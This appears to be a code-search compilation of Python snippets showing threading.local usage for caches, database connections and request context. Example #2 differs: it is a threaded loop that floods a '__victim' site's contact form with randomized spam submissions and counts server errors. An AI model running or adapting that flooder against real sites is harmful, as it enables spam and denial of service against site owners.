Example #1
_local = threading.local()  # module-level: one shared local object, per-thread data

def list_roles():
    # Each call to threading.local() returns a new, empty object, so the
    # cache must live on a single module-level instance to survive calls.
    roles = getattr(_local, "roles", None)
    if roles is None:
        roleapi = RoleAPI()
        roles = dict((r, roleapi.info(r)) for r in roleapi.list())
        _local.roles = roles
    return roles
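A minimal sketch (standard library only) of the pitfall the fix above guards against: every call to threading.local() constructs a brand-new, empty object, so per-thread attributes must live on one shared instance.

import threading

shared = threading.local()
shared.roles = {"admin": {}}
print(hasattr(threading.local(), "roles"))  # False: a fresh, unrelated object
print(hasattr(shared, "roles"))             # True: same instance, same thread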
Example #2
 def run(self):
     self.__req = self.__victim + '/contact-info'
     self.__headers = {'Referer': self.__req,
                       'Content-Type': 'multipart/form-data; boundary=---------------------------29713827018367436031035745563'}
     # Use a backoff sleep time to avoid all threads starting at once
     time.sleep(random.random())
     # One requests.Session per worker thread; Session objects should not be
     # shared across threads.
     session = requests.Session()
     while self.__running:
         self.__randstr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
         self.__data = '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.sender_fullname\"\x0d\x0a\x0d\x0aspammer ' + self.__randstr + '\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.sender_from_address\"\x0d\x0a\x0d\x0aspam-' + self.__randstr + '@nowhere.org\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.subject\"\x0d\x0a\x0d\x0aspam ' + self.__randstr + '\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.message\"\x0d\x0a\x0d\x0ajust_spam_' + self.__randstr + '\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.buttons.send\"\x0d\x0a\x0d\x0aSenden\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563--\x0d\x0a'
         try:
             self.__r = session.post(self.__req, headers=self.__headers, data=self.__data, verify = False)
             self.__e = self.__r.status_code
             self.__h = self.__r.headers
             self.__c = self.__r.content
             if self.__e >= 500: s = "5"
             else: s = "."
             # No need for thread safety here... Hrrhrrhrr :)
             sys.stdout.write(s)
         except requests.ConnectionError:
             sys.stdout.write("E")
Example #3
_local = threading.local()  # module-level: survives across calls

def list_filters():
    # As above, the thread-local must be a single shared instance; a fresh
    # threading.local() would never hold the cached value.
    filters = getattr(_local, "filters", None)
    if filters is None:
        filterapi = FilterAPI()
        filters = dict((f['id'], f) for f in filterapi.filters())
        _local.filters = filters
    return filters
Example #4
    def test_create_local_subclass_init_args(self):
        with self.assertRaisesRegex(TypeError,
                                    "Initialization arguments are not supported"):
            local("foo")

        with self.assertRaisesRegex(TypeError,
                                    "Initialization arguments are not supported"):
            local(kw="foo")
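The TypeError above applies only to the plain local type. A subclass that defines __init__ does accept arguments, and each thread re-runs __init__ with those same arguments on first access; a minimal sketch using only the standard library:

import threading

class Local(threading.local):
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)

loc = Local(kw="foo")  # no TypeError: the subclass defines __init__
print(loc.kw)          # 'foo'; each thread gets its own copy, re-initialized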
Example #5
_local = threading.local()  # one database connection per thread

def NewCursor():
    # Reuse this thread's connection if it exists; otherwise open a new one.
    # (Mixing a global with throwaway threading.local() objects, as before,
    # never persisted anything per thread.)
    connection = getattr(_local, "connection", None)
    if connection is None:
        connection = NewConnection()
        _local.connection = connection
    return connection.cursor()
Example #6
 _thread_local = threading.local()  # class attribute: one shared local, per-thread data

 def add_request(self, req_dict):
     if hasattr(self._thread_local, 'ds_request'):
         local_req = self._thread_local.ds_request
     else:
         local_req = {'cache': True}
     if 'cache' in req_dict and str(req_dict['cache']).lower() == 'false':
         local_req['cache'] = False
     self._thread_local.ds_request = local_req
Example #7
_local = threading.local()  # module-level: holds one Browser per thread

def _browser():
	""" Returns a thread-bound Browser object. The browser is initialized when created. """

	if hasattr(_local, "browser"):
		return _local.browser
	else:
		browser = mechanize.Browser()
		_initialize(browser)
		_local.browser = browser

		return browser
Example #8
_main_flag = threading.local()  # the main thread is expected to set _main_flag.isMain = True

def trapExit(code):
    """
    Cherrypy likes to call os._exit() which causes the interpreter to
    bomb without a chance of catching it. This sucks. This function
    will replace os._exit() and throw an exception instead.
    """
    if getattr(_main_flag, "isMain", False):
        # The main thread should raise an exception
        sys.stderr.write("*******EXIT WAS TRAPPED**********\n")
        raise RuntimeError("os._exit() was called in the main thread")
    else:
        # os._exit on child threads should just blow away the thread
        raise SystemExit("os._exit() was called in a child thread. "
                         "Protecting the interpreter and trapping it")
Example #9
 def run(self):
     serverip = self.kwargs['server']
     _timeout = self.kwargs['timeout']
     _lock = self.kwargs['lock']
     with _lock:
         print 'monitoring ' + serverip + ' with timeout ' +\
             str(_timeout)
     if syslog:
         syslog.syslog('monitoring ' + serverip)
     count = 0
     while True:
         for domain in config.domains():
             startTime = datetime.datetime.now()
             try:
                 req = DNS.Request(domain, qtype='A',
                                   server=serverip,
                                   timeout=_timeout).req()
                 endTime = datetime.datetime.now()
                 duration = _convert_milliseconds(endTime - startTime)
                 if req.header['status'] == 'NOERROR':
                     if config.verbose():
                         with _lock:
                             print domain + '@' + serverip + ' OK'
                     statusQueue.put('OK' +
                                     ' ' +
                                     serverip +
                                     ' ' +
                                     domain +
                                     ' ' +
                                     str(duration))
             except Exception:
                 endTime = datetime.datetime.now()
                 duration = _convert_milliseconds(endTime - startTime)
                 statusQueue.put('BAD ' +
                                 serverip +
                                 ' ' +
                                 domain +
                                 ' ' +
                                 str(duration))
         sleep(config.frequency())
         if (config.cycles()):
             count += 1
             cycles = config.cycles()
             if (count >= cycles):
                 break
Example #10
_local = threading.local()  # module-level cache holder, one dict per thread

def get_repos(reload=False):
    if reload:
        repos = None
    else:
        repos = getattr(_local, "repos", None)
    if repos is None:
        # this looks inefficient, and it is, but repos has to be fully
        # loaded before we can call _load_repo_extras(), so we have to
        # do this in two separate loops
        repoapi = RepositoryAPI()
        repos = dict((r["id"], r) for r in repoapi.repositories(dict()))
        for repo in repos.values():
            _load_repo_extras(repo, repos=repos)
        _local.repos = repos
    return repos
Example #11
    def __init__(self,
                 servers=None,
                 timeout=None,
                 ca_cert=None,
                 verify_ssl_cert=False,
                 error_trace=False,
                 cert_file=None,
                 key_file=None):
        if not servers:
            servers = [self.default_server]
        else:
            servers = _to_server_list(servers)
        self._active_servers = servers
        self._inactive_servers = []
        self._http_timeout = timeout
        pool_kw = _pool_kw_args(ca_cert, verify_ssl_cert)
        pool_kw['cert_file'] = cert_file
        pool_kw['key_file'] = key_file
        self.server_pool = {}
        self._update_server_pool(servers, timeout=timeout, **pool_kw)
        self._pool_kw = pool_kw
        self._lock = threading.RLock()
        self._local = threading.local()

        self.path = self.SQL_PATH
        if error_trace:
            self.path += '?error_trace=1'
Example #12
 def __init__(self, databases=None):
     """
     databases is an optional dictionary of database definitions (structured
     like settings.DATABASES).
     """
     self._databases = databases
     self._connections = local()
Example #13
 def __init__(self, preprocessors=None):
     self.use_default_preprocessors = False
     if isinstance(preprocessors, Iterable):
         self.preprocessors = tuple(preprocessors)
     elif preprocessors:
         self.preprocessors = (preprocessors,)
     else:
         self.preprocessors = ()  # ensure the attribute always exists
     self.__tls = threading.local()
Example #14
 def __init__(self, locks):
     if not isinstance(locks, tuple):
         locks = tuple(locks)
     if len(locks) <= 0:
         raise ValueError("Zero locks requested")
     self._locks = locks
     self._local = threading.local()
Example #15
def reset_translations():
    import gettext
    from django.utils.translation import trans_real
    gettext._translations = {}
    trans_real._translations = {}
    trans_real._default = None
    trans_real._active = threading.local()
Example #16
 def __init__(self):
     self._key_to_registration = dict()
     self._singleton_instances = dict()
     self._singleton_instances_lock = threading.Lock()
     self._weak_references = WeakValueDictionary()
     self._weak_references_lock = threading.Lock()
     self._thread_local = threading.local()
Example #17
    _ctx = threading.local()  # class attribute: one sqlite connection per thread

    def _load_tile(self, tile):
        # A global db connection cannot be shared across threads, so each
        # thread lazily opens its own on the shared thread-local.
        ctx = self._ctx
        if not hasattr(ctx, "db"):
            ctx.db = sqlite3.connect(self.filename)

        # get the right tile
        c = ctx.db.cursor()
        c.execute(
            ("SELECT tile_data FROM tiles WHERE "
            "zoom_level=? AND tile_column=? AND tile_row=?"),
            (tile.zoom, tile.tile_x, tile.tile_y))
        # print "fetch", tile.zoom, tile.tile_x, tile.tile_y
        row = c.fetchone()
        if not row:
            tile.state = "done"
            return

        # no-file loading
        try:
            data = io.BytesIO(row[0])
        except Exception:
            # android issue, "buffer" does not have the buffer interface
            # ie row[0] buffer is not compatible with BytesIO on Android??
            data = io.BytesIO(bytes(row[0]))
        im = CoreImage(data, ext='png',
                filename="{}.{}.{}.png".format(tile.zoom, tile.tile_x,
                    tile.tile_y))

        if im is None:
            tile.state = "done"
            return

        return self._load_tile_done, (tile, im, )
Example #18
    def __init__(self, size, **kwargs):
        if not isinstance(size, int):
            raise TypeError("Pool 'size' arg must be an integer")

        if not size > 0:
            raise ValueError("Pool 'size' arg must be greater than zero")

        logger.debug(
            "Initializing connection pool with %d connections", size)

        self._lock = threading.Lock()
        self._queue = Queue.LifoQueue(maxsize=size)
        self._thread_connections = threading.local()

        connection_kwargs = kwargs
        connection_kwargs['autoconnect'] = False

        for i in xrange(size):
            connection = Connection(**connection_kwargs)
            self._queue.put(connection)

        # The first connection is made immediately so that trivial
        # mistakes like unresolvable host names are raised immediately.
        # Subsequent connections are connected lazily.
        with self.connection():
            pass
Example #19
    def setUp(self):
        """
        Clear cached appstore connection
        """
        tank.util.shotgun.connection._g_sg_cached_connections = threading.local()
        tank.set_authenticated_user(None)

        # Prevents connecting to Shotgun.
        self._server_caps_mock = patch("tank_vendor.shotgun_api3.Shotgun.server_caps")
        self._server_caps_mock.start()
        self.addCleanup(self._server_caps_mock.stop)

        # Avoids a crash because we're not in a pipeline configuration.
        self._get_api_core_config_location_mock = patch(
            "tank.util.shotgun.connection.__get_api_core_config_location",
            return_value="unused_path_location"
        )
        self._get_api_core_config_location_mock.start()
        self.addCleanup(self._get_api_core_config_location_mock.stop)

        # Mocks app store script user credentials retrieval
        self._get_app_store_key_from_shotgun_mock = patch(
            "tank.descriptor.io_descriptor.appstore.IODescriptorAppStore."
            "_IODescriptorAppStore__get_app_store_key_from_shotgun",
            return_value=("abc", "123")
        )
        self._get_app_store_key_from_shotgun_mock.start()
        self.addCleanup(self._get_app_store_key_from_shotgun_mock.stop)
Example #20
 def __init__(
         self,
         parent=None,
         **kwargs
 ):
     self._construction_complete = False
     self._database = kwargs.pop('database', not_set)
     explicit_kwargs = list(kwargs)
     defaults = parent or settings.default
     if defaults is not None:
         for setting in all_settings.values():
             if kwargs.get(setting.name, not_set) is not_set:
                 kwargs[setting.name] = getattr(defaults, setting.name)
             elif setting.validator:
                 kwargs[setting.name] = setting.validator(
                     kwargs[setting.name])
         if self._database is not_set:
             self._database = defaults.database
     for name, value in kwargs.items():
         if name not in all_settings:
             raise InvalidArgument(
                 'Invalid argument %s' % (name,))
         setattr(self, name, value)
     self.storage = threading.local()
     self._construction_complete = True
     for k in explicit_kwargs:
         deprecation = all_settings[k].deprecation
         if deprecation:
             note_deprecation(deprecation, self)
Example #21
    def __init__(self, hub):
        self.badge_rules = []
        self.hub = hub

        super(FedoraBadgesConsumer, self).__init__(hub)

        self.consume_delay = int(self.hub.config.get('badges.consume_delay',
                                                     self.consume_delay))
        self.delay_limit = int(self.hub.config.get('badges.delay_limit',
                                                   self.delay_limit))

        # Five things need doing at start up time
        # 0) Set up a request local to hang thread-safe db sessions on.
        # 1) Initialize our connection to the tahrir DB and perform some
        #    administrivia.
        # 2) Initialize our connection to the datanommer DB.
        # 3) Load our badge definitions and rules from YAML.
        # 4) Initialize fedmsg so that those listening to us can handshake.

        # Thread-local stuff
        self.l = threading.local()

        # Tahrir stuff.
        self._initialize_tahrir_connection()

        # Datanommer stuff
        self._initialize_datanommer_connection()

        # Load badge definitions
        directory = hub.config.get("badges.yaml.directory", "badges_yaml_dir")
        self.badge_rules = self._load_badges_from_yaml(directory)
Example #22
_data = threading.local()  # module-level; other code may set _data.conf per thread

def getConf():
    if hasattr(_data, 'conf'):
        log.debug(_("Returning thread local configuration"))
        return _data.conf

    return conf
Example #23
 def _get_dict():
     if not Timing.context:
         import threading
         Timing.context = threading.local()
     if not hasattr(Timing.context, 'dict'):
         Timing.context.dict = {}
     return Timing.context.dict
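The lazy assignment above can race: two threads may both see a falsy Timing.context, and the later assignment silently discards the dict the earlier thread stored. A sketch of the usual remedy, assuming eager creation is acceptable:

import threading

class Timing(object):
    context = threading.local()  # created once at class definition time; no race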
Example #24
    def __init__(
        self, ns, logical_home_folder,
        inherits_from=None, inheritable_folders=None):
        """Creates a new instance of the datastore-backed file system.

        Args:
            ns: A datastore namespace to use for storing all data and metadata.
            logical_home_folder: A logical home dir of all files (/a/b/c/...).
            inherits_from: A file system to use for the inheritance.
            inheritable_folders: A list of folders that support inheritance.

        Returns:
            A new instance of the object.

        Raises:
            Exception: if invalid inherits_from is given.
        """

        if inherits_from and not isinstance(
                inherits_from, LocalReadOnlyFileSystem):
            raise Exception('Can only inherit from LocalReadOnlyFileSystem.')

        self._ns = ns
        self._logical_home_folder = AbstractFileSystem.normpath(
            logical_home_folder)
        self._inherits_from = inherits_from
        self._inheritable_folders = []
        self._cache = threading.local()

        if inheritable_folders:
            for folder in inheritable_folders:
                self._inheritable_folders.append(AbstractFileSystem.normpath(
                    folder))
Example #25
def _reset():
    '''
    Reset the thread local.
    '''
    import django_mobile
    del django_mobile._local
    django_mobile._local = threading.local()
Example #26
    def __init__(self, url, schema=None, reflectMetadata=True, engine_kwargs=None):
        if engine_kwargs is None:
            engine_kwargs = {}

        if url.startswith("postgres"):
            engine_kwargs.setdefault("poolclass", NullPool)

        self.lock = threading.RLock()
        self.local = threading.local()
        if "?" in url:
            url, query = url.split("?", 1)
            query = parse_qs(query)
            if schema is None:
                # le pop
                schema_qs = query.pop("schema", query.pop("searchpath", []))
                if len(schema_qs):
                    schema = schema_qs.pop()
            if len(query):
                url = url + "?" + urlencode(query, doseq=True)
        self.schema = schema
        self.engine = create_engine(url, **engine_kwargs)
        self.url = url
        self.metadata = MetaData(schema=schema)
        self.metadata.bind = self.engine
        if reflectMetadata:
            self.metadata.reflect(self.engine)
        self._tables = {}
Example #27
 def _blank_copy(self, c):
     super(FullFrontend, self)._blank_copy(c)
     c._track = self._track
     c._solver_backend = self._solver_backend
     c.timeout = self.timeout
     c._tls = threading.local()
     c._to_add = []
Example #28
 def __init__(self, solver_backend, timeout=None, track=False, **kwargs):
     ConstrainedFrontend.__init__(self, **kwargs)
     self._track = track
     self._solver_backend = solver_backend
     self.timeout = timeout if timeout is not None else 300000
     self._tls = threading.local()
     self._to_add = []
Example #29
    def __init__(self, sqluri, standard_collections=False, **dbkwds):

        self.sqluri = sqluri
        self.dbconnector = DBConnector(sqluri, **dbkwds)

        # There doesn't seem to be a reliable cross-database way to set the
        # initial value of an autoincrement column.  Fake it by inserting
        # a row into the table at the desired start id.
        self.standard_collections = standard_collections
        if self.standard_collections and dbkwds.get("create_tables", False):
            zeroth_id = FIRST_CUSTOM_COLLECTION_ID - 1
            with self.dbconnector.connect() as connection:
                params = {"collectionid": zeroth_id, "name": ""}
                try:
                    connection.query("INSERT_COLLECTION", params)
                except IntegrityError:
                    pass

        # A local in-memory cache for the name => collectionid mapping.
        self._collections_by_name = {}
        self._collections_by_id = {}
        if self.standard_collections:
            for id, name in STANDARD_COLLECTIONS:
                self._collections_by_name[name] = id
                self._collections_by_id[id] = name

        # A thread-local to track active sessions.
        self._tldata = threading.local()
Example #30
 def _ana_setstate(self, s):
     backend_name, self.timeout, self._track, base_state = s
     self._solver_backend = backends._backends_by_type[backend_name]
     # self._tls = None
     self._tls = threading.local()
     self._to_add = []
     ConstrainedFrontend._ana_setstate(self, base_state)
Example #31
 def __init__(self):
     self.local_res = threading.local()
Example #32
import contextlib
import threading

from tensorflow.python.eager import execute
from tensorflow.python.eager import tape
from tensorflow.python.eager.graph_only_ops import graph_placeholder
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_module
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator

# Thread-local storage for tfe Tensors which are referenced while evaluating a
# graph-mode function.
_scoped_captures = threading.local()
# _scoped_captures.tensors is either None or a map from Tensor id to a pair
# of a tfe tensor and its corresponding placeholder to pass as a function
# argument. The value should be None unless we're in function definition
# context.
_scoped_captures.tensors = None


@contextlib.contextmanager
def capture_tensors(captures):
    old = _scoped_captures.__dict__.get("tensors", None)
    try:
        _scoped_captures.tensors = captures
        yield
    finally:
        _scoped_captures.tensors = old
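The same save-and-restore pattern, reduced to a generic sketch with illustrative names (nothing here is TensorFlow-specific): stash the previous per-thread value, install the new one, and restore it on exit even if the body raises.

import contextlib
import threading

_state = threading.local()

@contextlib.contextmanager
def scoped_value(value):
    old = getattr(_state, "value", None)
    _state.value = value
    try:
        yield
    finally:
        _state.value = old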
Example #33
from __future__ import print_function

import collections
import inspect
import linecache
import sys
import threading

# Names for indices into TF traceback tuples.
TB_FILENAME = 0
TB_LINENO = 1
TB_FUNCNAME = 2
TB_CODEDICT = 3  # Dictionary of Python interpreter state.


stacks = threading.local()


def _source_mappers():
  if not hasattr(stacks, 'source_mapper'):
    stacks.source_mapper = []
  return stacks.source_mapper


def _source_filters():
  if not hasattr(stacks, 'source_filter'):
    stacks.source_filter = []
  return stacks.source_filter


class StackTraceMapper(object):
Example #34
"""Contains AutoCastVariable, a variable which automatically casts itself."""

import tensorflow.compat.v2 as tf

import threading
from keras.distribute import distributed_training_utils

# _autocast_dtype.dtype is the dtype AutoCastVariables should be cast to, or
# None if AutoCastVariables should not be cast.
_autocast_dtype = threading.local()


def numpy_text(tensor, is_repr=False):
    """Human readable representation of a tensor's numpy value."""
    if tensor.dtype.is_numpy_compatible:
        # pylint: disable=protected-access
        text = repr(tensor._numpy()) if is_repr else str(tensor._numpy())
        # pylint: enable=protected-access
    else:
        text = '<unprintable>'
    if '\n' in text:
        text = '\n' + text
    return text

Example #35
except ImportError:
    have_minify = False

try:
    import simplejson as sj  #external installed library
except ImportError:
    try:
        import json as sj  #standard installed library
    except ImportError:
        import contrib.simplejson as sj  #pure python library

regex_session_id = re.compile('^([\w\-]+/)?[\w\-\.]+$')

__all__ = ['Request', 'Response', 'Session']

current = threading.local()  # thread-local storage for request-scope globals

css_template = '<link href="%s" rel="stylesheet" type="text/css" />'
js_template = '<script src="%s" type="text/javascript"></script>'
coffee_template = '<script src="%s" type="text/coffee"></script>'
typescript_template = '<script src="%s" type="text/typescript"></script>'
less_template = '<link href="%s" rel="stylesheet/less" type="text/css" />'
css_inline = '<style type="text/css">\n%s\n</style>'
js_inline = '<script type="text/javascript">\n%s\n</script>'


def copystream_progress(request, chunk_size=10**5):
    """
    copies request.env.wsgi_input into request.body
    and stores progress upload status in cache_ram
    X-Progress-ID:length and X-Progress-ID:uploaded
Example #36
_ITEMS_PROCESSOR_ARGS_LEN = 0
"""Number of arguments accepted by items processor."""

_I18N_TREES = []
"""Stores aliases of trees supporting internationalization."""

_DYNAMIC_TREES = {}
"""Holds trees dynamically loaded from project apps."""

_IDX_ORPHAN_TREES = 'orphans'
"""Dictionary index in `_DYNAMIC_TREES` for orphaned trees list."""

_IDX_TPL = '%s|:|%s'
"""Name template used as dictionary index in `_DYNAMIC_TREES`."""

_THREAD_LOCAL = local()
_THREAD_SITETREE = 'sitetree'

_CONTEXT_FLATTEN = VERSION >= (1, 11)

_UNSET = set()  # Sentinel


def get_sitetree():
    """Returns SiteTree (thread-singleton) object, implementing utility methods.

    :rtype: SiteTree
    """
    sitetree = getattr(_THREAD_LOCAL, _THREAD_SITETREE, None)

    if sitetree is None:
Example #37
from logging.config import dictConfig

from connect.config import Config
from connect.logger import logger

# Configure logging
if os.path.exists('/etc/cloudblue-connector/config-logging.json'):
    with open(
            '/etc/cloudblue-connector/config-logging.json') as config_log_file:
        settings = json.load(config_log_file)
        dictConfig(settings['logging'])

# Set connect log level (the default level is ERROR)
logger.setLevel('DEBUG')

context_data = threading.local()
context_data.request_id = None


class ContextFilter(logging.Filter):
    """
    This is a filter which injects contextual information into the log record.
    """
    def filter(self, record):
        # Threads that never set request_id would otherwise raise
        # AttributeError, so read it with a default.
        if getattr(context_data, 'request_id', None):
            record.name += "." + context_data.request_id
        return True


class PasswordFilter(logging.Filter):
    """
Example #38
from django.utils.http import urlquote
from django.utils.importlib import import_module
from django.utils.module_loading import module_has_submodule
from django.utils.regex_helper import normalize
from django.utils import six
from django.utils.translation import get_language

_resolver_cache = {}  # Maps URLconf modules to RegexURLResolver instances.
_ns_resolver_cache = {}  # Maps namespaces to RegexURLResolver instances.
_callable_cache = {}  # Maps view and url pattern names to their view functions.

# SCRIPT_NAME prefixes for each thread are stored here. If there's no entry for
# the current thread (which is the only one we ever access), it is assumed to
# be empty.
_prefixes = local()

# Overridden URLconfs for each thread are stored here.
_urlconfs = local()


class ResolverMatch(object):
    def __init__(self,
                 func,
                 args,
                 kwargs,
                 url_name=None,
                 app_name=None,
                 namespaces=None):
        self.func = func
        self.args = args
Example #39
 def unoconv_client(self):
     if not hasattr(self, '_unoconv_client'):
         self._unoconv_client = threading.local()
     if not hasattr(self._unoconv_client, 'session'):
         self._unoconv_client.session = requests.Session()
     return self._unoconv_client.session
Example #40
import threading
import time
from functools import partial

from django.apps import apps
from django.conf import settings
from django.db.models.signals import pre_save
from django.utils.deprecation import MiddlewareMixin

from auditlog.models import LogEntry

threadlocal = threading.local()


class AuditlogMiddleware(MiddlewareMixin):
    """
    Middleware to couple the request's user to log items. This is accomplished by currying the signal receiver with the
    user from the request (or None if the user is not authenticated).
    """

    def process_request(self, request):
        """
        Gets the current user from the request and prepares and connects a signal receiver with the user already
        attached to it.
        """
        # Initialize thread local storage
        threadlocal.auditlog = {
            'signal_duid': (self.__class__, time.time()),
            'remote_addr': request.META.get('REMOTE_ADDR'),
        }
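The docstring above describes currying a signal receiver with the request's user. A hedged sketch of that wiring, not auditlog's actual code; set_actor and the actor field are illustrative:

def set_actor(user, sender, instance, **kwargs):
    if getattr(instance, 'actor', None) is None:
        instance.actor = user  # 'actor' is a hypothetical field name

def connect_receiver(request):
    receiver = partial(set_actor, getattr(request, 'user', None))
    pre_save.connect(receiver, sender=LogEntry, weak=False,
                     dispatch_uid=threadlocal.auditlog['signal_duid'])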
Example #41
import threading

current_user_store = threading.local()


class GlobalUserMiddleware(object):
    def process_request(self, request):
        if request.user:
            current_user_store.user = request.user
        return None

    def process_response(self, request, response):
        if hasattr(current_user_store, 'user'):
            del current_user_store.user
        return response

    def process_exception(self, request, exception):
        if hasattr(current_user_store, 'user'):
            del current_user_store.user
        return None
Example #42
      return
    # Under eager mode. Eagerly execute check_numerics op.
    for slot, output in enumerate(outputs):
      if (output.dtype.is_floating and
          (op_type_bytes, slot) not in IGNORE_OP_OUTPUTS):
        array_ops.check_numerics(
            output,
            get_check_numerics_error_message(
                slot, len(outputs), op_type, output, inputs,
                stack_height_limit=_state.config.stack_height_limit,
                path_length_limit=_state.config.path_length_limit))


CheckNumericsConfig = collections.namedtuple(
    "CheckNumericsConfig", "stack_height_limit path_length_limit")
_state = threading.local()


@tf_export("debugging.enable_check_numerics")
def enable_check_numerics(stack_height_limit=30,
                          path_length_limit=50):
  r"""Enable tensor numerics checking in an eager/graph unified fashion.

  The numerics checking mechanism will cause any TensorFlow eager execution or
  graph execution to error out as soon as an op's output tensor contains
  infinity or NaN.

  This method is idempotent. Calling it multiple times has the same effect
  as calling it once.

  This method takes effect only on the thread in which it is called.
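A minimal usage sketch for the API documented above; per the docstring, the check is idempotent and affects only the calling thread.

import tensorflow as tf

tf.debugging.enable_check_numerics()
x = tf.constant([0.0, 1.0])
y = x / x  # 0/0 yields NaN; with checking enabled this op raises an error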
Example #43
File: core.py Project: spotify/klio
class KlioContext(object):
    """Context related to the currently running job.

    Available to transforms via one of the :ref:`KlioContext decorators
    <klio-context-decorators>`.
    """

    _thread_local = threading.local()

    def __init__(self):
        self.__transform_name = None

    def _create_klio_job_obj(self):
        klio_job = klio_pb2.KlioJob()
        klio_job.job_name = self.config.job_name
        klio_job.gcp_project = self.config.pipeline_options.project
        klio_job_str = klio_job.SerializeToString()
        return klio_job_str

    def _get_metrics_registry(self):
        native_metrics_client = native_metrics.NativeMetricsClient(self.config)
        clients = [native_metrics_client]
        use_logger, use_shumway = None, None
        metrics_config = self.config.job_config.metrics

        # use_logger/use_shumway could be False (turn off),
        # None (use default config), or a dict of configured values
        use_logger = metrics_config.get("logger")
        use_shumway = metrics_config.get("shumway")

        # TODO: set runner in OS environment (via klio-exec), since
        #       the runner defined in config could be overwritten via
        #       `--direct-runner`.
        #       i.e.: runner = os.getenv("BEAM_RUNNER", "").lower()
        runner = self.config.pipeline_options.runner

        if kvars.KlioRunner.DIRECT_RUNNER != runner:
            if use_logger is None:
                use_logger = False

        # use shumway when running on DirectGKERunner unless it's explicitly
        # turned off/set to False. Don't set it to True if it's set to False
        # or it's a dictionary (aka has some configuration)
        if kvars.KlioRunner.DIRECT_GKE_RUNNER == runner:
            if use_shumway is None:
                use_shumway = True
        # shumway only works on DirectGKERunner, so we explicitly set it
        # to False
        else:
            use_shumway = False

        if use_logger is not False:
            logger_client = metrics_logger.MetricsLoggerClient(self.config)
            clients.append(logger_client)

        if use_shumway is not False:
            shumway_client = shumway.ShumwayMetricsClient(self.config)
            clients.append(shumway_client)

        return metrics_client.MetricsRegistry(
            clients, transform_name=self._transform_name)

    @property
    def config(self):
        """A ``KlioConfig`` instance representing the job's configuration."""
        return RunConfig.get()

    @property
    def job(self):
        """An instance of :ref:`kliojob` of the current job."""
        klio_job = getattr(self._thread_local, "klio_job", None)
        if not klio_job:
            self._thread_local.klio_job = self._create_klio_job_obj()
        return self._thread_local.klio_job

    @property
    def logger(self):
        """A namespaced logger.

        Equivalent to ``logging.getLogger("klio")``.
        """
        klio_logger = getattr(self._thread_local, "klio_logger", None)
        if not klio_logger:
            self._thread_local.klio_logger = logging.getLogger("klio")
        return self._thread_local.klio_logger

    @property
    def metrics(self):
        """A metrics registry instance.

        See :ref:`metrics <metrics>` for more information."""
        metrics_registry = getattr(self._thread_local, "klio_metrics", None)
        if not metrics_registry:
            self._thread_local.klio_metrics = self._get_metrics_registry()
        return self._thread_local.klio_metrics

    # <-- private/internal attributes -->
    @property
    def _transform_name(self):
        return self.__transform_name

    @_transform_name.setter
    def _transform_name(self, name):
        self.__transform_name = name
Example #44
class action:
    """@action(...) is a decorator for functions to be exposed as actions"""

    current = threading.local()
    registered = set()
    app_name = "_default"

    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    @staticmethod
    def uses(*fixtures_in):
        """Find all fixtures, including dependencies, topologically sorted"""
        fixtures = []
        reversed_fixtures = []
        stack = list(fixtures_in)
        while stack:
            fixture = stack.pop()
            reversed_fixtures.append(fixture)
            for other in getattr(fixture, "__prerequisites__", []):
                stack.append(other)
        for fixture in reversed(reversed_fixtures):
            if isinstance(fixture, str):
                fixture = Template(fixture)
            if fixture not in fixtures:
                fixtures.append(fixture)

        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                # data shared by all fixtures in the pipeline for each request
                shared_data = {"template_context": {}}
                try:
                    [obj.on_request() for obj in fixtures]
                    ret = func(*args, **kwargs)
                    for obj in fixtures:
                        ret = obj.transform(ret, shared_data)
                    [obj.on_success() for obj in fixtures]
                    return ret
                except HTTP:
                    [obj.on_success() for obj in fixtures]
                    raise
                except Exception:
                    [obj.on_error() for obj in fixtures]
                    raise

            return wrapper

        return decorator

    @staticmethod
    def requires(*requirements):
        """Enforces requirements or calls bottle.abort(401)"""
        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                for requirement in requirements:
                    if not requirement():
                        bottle.abort(401)
                return func(*args, **kwargs)

            return wrapper

        return decorator

    @staticmethod
    def catch_errors(app_name, func):
        """Catches and logs errors in an action; also sets request.app_name"""
        @functools.wraps(func)
        def wrapper(*func_args, **func_kwargs):
            try:
                request.app_name = app_name
                ret = func(*func_args, **func_kwargs)
                if isinstance(ret, dict):
                    response.headers["Content-Type"] = "application/json"
                    ret = dumps(ret)
                return ret
            except HTTP as http:
                response.status = http.status
                return ""
            except bottle.HTTPResponse:
                raise
            except Exception:
                logging.error(traceback.format_exc())
                try:
                    ticket = ErrorStorage().log(request.app_name,
                                                get_error_snapshot())
                except Exception:
                    logging.error(traceback.format_exc())
                    ticket = "unknown"
                return error_page(500,
                                  button_text=ticket,
                                  href="/_dashboard/ticket/" + ticket)

        return wrapper

    def __call__(self, func):
        """Building the decorator"""
        app_name = action.app_name
        path = ("/" if app_name == "_default" else "/%s/" %
                app_name) + self.path  # the _default app has no prefix
        if func not in self.registered:
            func = action.catch_errors(app_name, func)
        func = bottle.route(path, **self.kwargs)(func)
        if path.endswith("/index"):  # /index is always optional
            func = bottle.route(path[:-6] or "/", **self.kwargs)(func)
        self.registered.add(func)
        return func
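A short usage sketch for the decorator above, py4web-style; the route path and template name are illustrative.

@action("index")
@action.uses("index.html")  # a template fixture, expanded topologically as above
def index():
    return {"message": "hello"}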
Example #45
from bugbug import bugzilla, db, repository
from bugbug.models.regressor import (
